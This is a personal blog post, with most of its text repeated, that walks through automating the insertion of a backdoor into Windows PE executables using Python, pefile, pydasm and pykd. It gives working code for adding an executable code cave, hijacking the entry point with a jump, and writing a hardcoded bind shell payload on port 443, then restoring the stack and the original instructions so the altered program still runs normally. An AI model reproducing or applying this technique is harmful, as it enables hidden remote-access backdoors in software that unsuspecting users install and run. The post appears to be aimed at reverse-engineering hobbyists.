Automating backdoor creation for PE files
Hello,
In this post I shall write about my experiences/attempt on automating the process of backdoor creation for windows PE(Portable Executable) files.
More than a short and quick success attempt, it been many a failures and frustrations but I made some commendable progress by trying harder.
I would like to point out that I am not publishing the entire code but giving you an outline as to "how to do it" but will include short code snippets
The post highlights my journey where I faced most issues and spent most times and where I could have done better
The rough idea for a backdoor is that we need to redirect the code flow at entry point of a PE file to a clean section within the PE file where shellcode is located to do the evil deed and it hand's off control back to the original code execution of the file.
But we need to talk about the above statement in a detailed manner.
[+] Getting the entry point of a PE & making a clean section within PE file.
When loading a program in a debugger(atleast Immunity or Ollydbg), you can see that the program stops just before the main function and asks us if we want to run it further.
Well that's the entrypoint. It is this address we need to find and more over this post is about automating the entire process so how did I go about doing it?
Well, when I talk about automating it, I mean pythonizing it.(cuz' thats the best automation language I know)
And well Python comes with a bunch of modules that you can import.
Comes to rescue "pefile" module!
Reading more about the pe-file structure we come to know that this EntryPoint in a PE file can actually be found from static analysis (ie. not running the PE file) as the PE file has a marked tag which points to the entrypoint.
Inside PE OPTIONAL_HEADER we find the attribute "AddressOfEntryPoint".
And in language of Python:
However if you compare the output of ep to that of actual address via debugger, you will see that there is an offset. What is this offset?
It turns out that the value if ep is RVA(Relative Virtual Address) but relative to what?
PE files have ImageBase address which when address to RVA gives the actual Virtual Address which we see on debugger.
Hence I need to do this:
Now I have the actual entry point address.
Next, I need to get the assembly codes of the instructions which are located just initially at EP.
In this case, another python module comes to rescue called pydasm!
After some research over the web, I was able to locate a sensible code that made perfect logic to extract what I required.
The iterator offset basically sets the point from where we shell be reading the instructions and in which mode the instructions need to be decoded (MODE_32).
Also, for the rendering of instructions, in the get_instruction_string, we supply the processor with which we are dealing with (FORMAT_INTEL)
So, right now I have completed 2 steps towards automation (getting break-point and getting the initial instructions).
Next up are two more objectives:
[+] Setting up the code cave.
[+] Overwriting the initial instructions to jump to the code cave.
For setting up the code cave, I had to search for a long time on web (struggle!).
Mostly I was finding only limited editing of a PE file that can done by pefile module of python.
And I found this hidden gem in a reddit thread:
https://www.reddit.com/r/ReverseEngineering/comments/1jpghd/addingremoving_sections_with_python/
Seems there is indeed hope for editing PE files to add a new section!
I downloaded the python module into my python directory and was able to get its benefits:
In this code, first I define a section object and next I define the attributes of that section (let me remind you here that the section needs to be "writable" and "executable")
And hence in the characteristics flag value is defined to be "0xE0000020" for 777 permission.
The virtual Size (again an RVA)attribute tells how large (in bytes) the section should be and push_back pushes this new section at the end of all the PE file sections.
Technically if my PE file starts at 0x04000000, then my new section would start at 0x40001000 in actual virtual address.
Next I need to overwrite the original instructions with my "hijacking" instruction.
We will need to redirect instruction to the start of our newly made code cave.
Here I prefer to use a jump(why not a call? 'cuz I hate meddling with stack, that too when I am doing static file modification and have no idea what values registers will be!)
The trick with jmp <address> which I did not know was that this <address> is always a relative address.
Relative to what?
Well the
dest. address = start address of new PE section that we made
start address = start address of PE file (entrypoint)
-5 = this is the size of jmp instruction in itself to adjust the address.
Hence a rough code I came up was this:
All right now we just need to prepend the above generated opcode with jmp opcode "\xe9"
So we are going to write "\xe9" + "jmp_address" opcodes at the entry point.
While writing to the file, we remember to save the actual legitimate instructions so that we can replay them later.
code to rewrite the entry point instructions:
Next once the entry point has been overwritten with jmp <new_PE_section_address> we can change the instructions in the new clean PE section with first saving the registers and flags (pushad,pushfd) and then writing the shellcode.
Here I used an alphanumeric bind shellcode that binds to port 443.
Now here I know its not true automation to have a hardcoded shellcode but maybe thats for version 1.1 (as an improvement?)
shellcode = "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd56a085950e2fd4050405068ea0fdfe0ffd59768020001bb89e66a10565768c2db3767ffd55768b7e938ffffd5576874ec3be1ffd5579768756e4d61ffd568636d640089e357575731f66a125956e2fd66c744243c01018d442410c60044545056565646564e565653566879cc3f86ffd589e0905690ff306808871d60ffd5bbfe0e32ea68a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd5"
[+] Post shellcode execution, adjust ESP to initial ESP
[*] Here comes Dynamic analysis via Python
[+] Saving initial ESP:
[+] Getting the final ESP (breakpoint at where the shellcode ends [can be calulated via the length of shellcode])
- nightcr4wl3r
In this post I shall write about my experiences/attempt on automating the process of backdoor creation for windows PE(Portable Executable) files.
More than a short and quick success attempt, it been many a failures and frustrations but I made some commendable progress by trying harder.
I would like to point out that I am not publishing the entire code but giving you an outline as to "how to do it" but will include short code snippets
The post highlights my journey where I faced most issues and spent most times and where I could have done better
The rough idea for a backdoor is that we need to redirect the code flow at entry point of a PE file to a clean section within the PE file where shellcode is located to do the evil deed and it hand's off control back to the original code execution of the file.
But we need to talk about the above statement in a detailed manner.
[+] Getting the entry point of a PE & making a clean section within PE file.
When loading a program in a debugger(atleast Immunity or Ollydbg), you can see that the program stops just before the main function and asks us if we want to run it further.
Well that's the entrypoint. It is this address we need to find and more over this post is about automating the entire process so how did I go about doing it?
Well, when I talk about automating it, I mean pythonizing it.(cuz' thats the best automation language I know)
And well Python comes with a bunch of modules that you can import.
Comes to rescue "pefile" module!
Reading more about the pe-file structure we come to know that this EntryPoint in a PE file can actually be found from static analysis (ie. not running the PE file) as the PE file has a marked tag which points to the entrypoint.
Inside PE OPTIONAL_HEADER we find the attribute "AddressOfEntryPoint".
And in language of Python:
pe = pefile.PE("tempCave.exe")
ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
However if you compare the output of ep to that of actual address via debugger, you will see that there is an offset. What is this offset?
It turns out that the value if ep is RVA(Relative Virtual Address) but relative to what?
PE files have ImageBase address which when address to RVA gives the actual Virtual Address which we see on debugger.
Hence I need to do this:
ep_ava = ep+pe.OPTIONAL_HEADER.ImageBase
Now I have the actual entry point address.
Next, I need to get the assembly codes of the instructions which are located just initially at EP.
In this case, another python module comes to rescue called pydasm!
After some research over the web, I was able to locate a sensible code that made perfect logic to extract what I required.
save_instr = [] #array to save the instructions
d = {} #dictionary to append the address of instructions to the actual instructions.
while offset < len(data):
i = pydasm.get_instruction(data[offset:], pydasm.MODE_32)
print "i: " + str(i)
instr = pydasm.get_instruction_string(i, pydasm.FORMAT_INTEL, ep_ava+offset)
save_instr.append(instr)
interim = str(hex(ep_ava+offset))
d[interim] = instr
offset += i.length
The iterator offset basically sets the point from where we shell be reading the instructions and in which mode the instructions need to be decoded (MODE_32).
Also, for the rendering of instructions, in the get_instruction_string, we supply the processor with which we are dealing with (FORMAT_INTEL)
So, right now I have completed 2 steps towards automation (getting break-point and getting the initial instructions).
Next up are two more objectives:
[+] Setting up the code cave.
[+] Overwriting the initial instructions to jump to the code cave.
For setting up the code cave, I had to search for a long time on web (struggle!).
Mostly I was finding only limited editing of a PE file that can done by pefile module of python.
And I found this hidden gem in a reddit thread:
https://www.reddit.com/r/ReverseEngineering/comments/1jpghd/addingremoving_sections_with_python/
Seems there is indeed hope for editing PE files to add a new section!
I downloaded the python module into my python directory and was able to get its benefits:
sections = SectionDoubleP.SectionDoubleP(pe)
sections.push_back(VirtualSize=0x00001000, RawSize=0x00001000, Characteristics=0xE0000020)
In this code, first I define a section object and next I define the attributes of that section (let me remind you here that the section needs to be "writable" and "executable")
And hence in the characteristics flag value is defined to be "0xE0000020" for 777 permission.
The virtual Size (again an RVA)attribute tells how large (in bytes) the section should be and push_back pushes this new section at the end of all the PE file sections.
Technically if my PE file starts at 0x04000000, then my new section would start at 0x40001000 in actual virtual address.
Next I need to overwrite the original instructions with my "hijacking" instruction.
We will need to redirect instruction to the start of our newly made code cave.
Here I prefer to use a jump(why not a call? 'cuz I hate meddling with stack, that too when I am doing static file modification and have no idea what values registers will be!)
The trick with jmp <address> which I did not know was that this <address> is always a relative address.
Relative to what?
Well the
<address> = [dest. address] - [start address] - 5
dest. address = start address of new PE section that we made
start address = start address of PE file (entrypoint)
-5 = this is the size of jmp instruction in itself to adjust the address.
Hence a rough code I came up was this:
jmp_address = int(dest_address,16) - int(start_address) - 5
jmp_address = hex( struct.unpack( '<L', struct.pack('>L', jmp_address) ) [0] ) [2:] #to make the address in little endian for Intel.
All right now we just need to prepend the above generated opcode with jmp opcode "\xe9"
So we are going to write "\xe9" + "jmp_address" opcodes at the entry point.
While writing to the file, we remember to save the actual legitimate instructions so that we can replay them later.
code to rewrite the entry point instructions:
print "\t[+]overwriting entrypoint with a jump to code cave"
ep_hex = int(ep_hex,16)
for instruction in jmp_opcodes:
#print "injecting value: " + instruction + " injecting at: " + str(ep_hex)
instruction = int(instruction,16)
status = pe.set_bytes_at_rva(ep_hex,chr(instruction))
if(status is False):
print "[!]entry point hijacking failed..."
ep_hex = ep_hex + 1
Next once the entry point has been overwritten with jmp <new_PE_section_address> we can change the instructions in the new clean PE section with first saving the registers and flags (pushad,pushfd) and then writing the shellcode.
Here I used an alphanumeric bind shellcode that binds to port 443.
Now here I know its not true automation to have a hardcoded shellcode but maybe thats for version 1.1 (as an improvement?)
shellcode = "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd56a085950e2fd4050405068ea0fdfe0ffd59768020001bb89e66a10565768c2db3767ffd55768b7e938ffffd5576874ec3be1ffd5579768756e4d61ffd568636d640089e357575731f66a125956e2fd66c744243c01018d442410c60044545056565646564e565653566879cc3f86ffd589e0905690ff306808871d60ffd5bbfe0e32ea68a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd5"
I would like to remind here that the above shellcode has been backdoorified (in the sense that there is a wait for infinite time when a value of -1 is pushed onto the stack)
I have changed the opcodes above such that the bind works without hampering the execution of original program (which we are backdooring).
So, with our shellcode cleanly written using the code:
shellcode_len = len(shellcode)
write_code = []
#making instruction list
for i in range(0,shellcode_len,2):
write_code.append(shellcode[i:i+2])
number_of_instructions = len(write_code)
#setting EIP to the next memory location to write[robed = name of new PE section that I made]
robed_VA = robed_VA + 1
#writing shellcode
count = 0
while(number_of_instructions > 0):
pe.set_bytes_at_rva(robed_VA, chr(0x9c))
shellcode_instruction = "0x" + write_code[count]
shellcode_instruction = int(shellcode_instruction, 16)
status = pe.set_bytes_at_rva(robed_VA,chr(shellcode_instruction))
# print "injecting value: " + str(hex(shellcode_instruction)) + " injecting at: " + str(hex(robed_VA))
# print status
robed_VA = robed_VA + 1 #increment to next instruction pointer
count = count + 1 #increment the write_code counter to write the next instruction of shellcode
# if count> 10:
# break
number_of_instructions = number_of_instructions - 1 #decrement number_of_instructions until zero to stop while loop
print "[+]Shellcode successfully written"
We will now proceed to save the file.
#code
pe.write(filename="tmp.exe")
Now, this saved PE file has the initial address hijacked and registers and flags (pushad, pushfd) saved and shellcode written on hijacked address.
We have now three more points to cover:
[+] Post shellcode execution, adjust ESP to initial ESP
[+] pop the initial registers and flags(popfd, popad [since stack is FILO structure])
[+] Writing the initial instructions which were saved to make actual program run normally
The adjusting the ESP was the biggest hindrance and I spent three days fighting how can I adjust esp to a value while doing static file analysis and editing.
It quickly became clear to automate this step I will need some extra juice!
[*] Here comes Dynamic analysis via Python
Immunity could not be automated unless I am explictly running pycommand and I could not find any suitable way to run pycommands in a python script without running Immunity.
For ollydbg I could not find any integration in python.
Running through multiple blogs and asking questions here and there (no answers!), I came upon a thread which talked about pykd python module and windbg integration.
But I must say, pykd is documented much in Russian and I had to read quite a while to get some hold of it to meet my needs for automation.
And here comes the code which made adjusting esp successful.
[+] Saving initial ESP:
pykd.startProcess(fileName)
print "[+]setting entry point breakpoint"
pykd.dbgCommand("bp $exentry")
print "[+]stepping into breakpoint"
pykd.dbgCommand("g")
print "[+]Fetching address of esp @entryPoint"
#print "[+]" + str(pykd.dbgCommand("r esp"))
initial_esp = str(pykd.dbgCommand("r esp"))
#print type(initial_esp)
initial_esp = initial_esp.split("=")[1]
#print "splitted..." + initial_esp
initial_esp = "0x"+initial_esp
print "[+]Initial ESP: " + initial_esp
initial_esp = int(initial_esp,16)
[+] Getting the final ESP (breakpoint at where the shellcode ends [can be calulated via the length of shellcode])
print "[+]Starting the temporary executable which we had saved earlier"
pykd.startProcess("tmp.exe")
print "\t[+]setting final breakpoint"
bpCmd = "bp " + final_eip
pykd.dbgCommand(bpCmd)
print "\t[+]stepping into breakpoint"
print "\t[+]make a connection to the host at port 443"
print "\t[+]waiting..."
pykd.dbgCommand("g")
print "\t[+]Fetching address of esp @entryPoint"
print "\t[+]" + str(pykd.dbgCommand("r esp")).replace("=",":")
final_esp = str(pykd.dbgCommand("r esp"))
print final_esp
print "[+]processing esp..."
final_esp = final_esp.split("=")[1]
final_esp = "0x"+final_esp
final_esp = int(final_esp,16)
print "\t[+]Final esp: " + str(final_esp)
And I got out of the seemingly tight spot as to how to calculate the ESP.
Next up is simple as to add esp, <esp address difference>
and then writing popfd, popad.
Now for replaying the initial instructions, remember we saved them?
We will now write these just after the popad (which is the last instruction).
The replaying of original instructions could be a little complicated however, since the address was saved for each initial instruction, I was able to write the initial "original" push instruction and write the address of the original "call" instruction to redirect to original code flow.
But this part certainly needs to have a more generic approach from my part.
With this, I shall end this long post.
Though many of you guys might find this redundant and the cod/logic may be hugely un-optimized but I wanted to share as to how I did it in my path of struggle (call it blabbering :P)
- nightcr4wl3r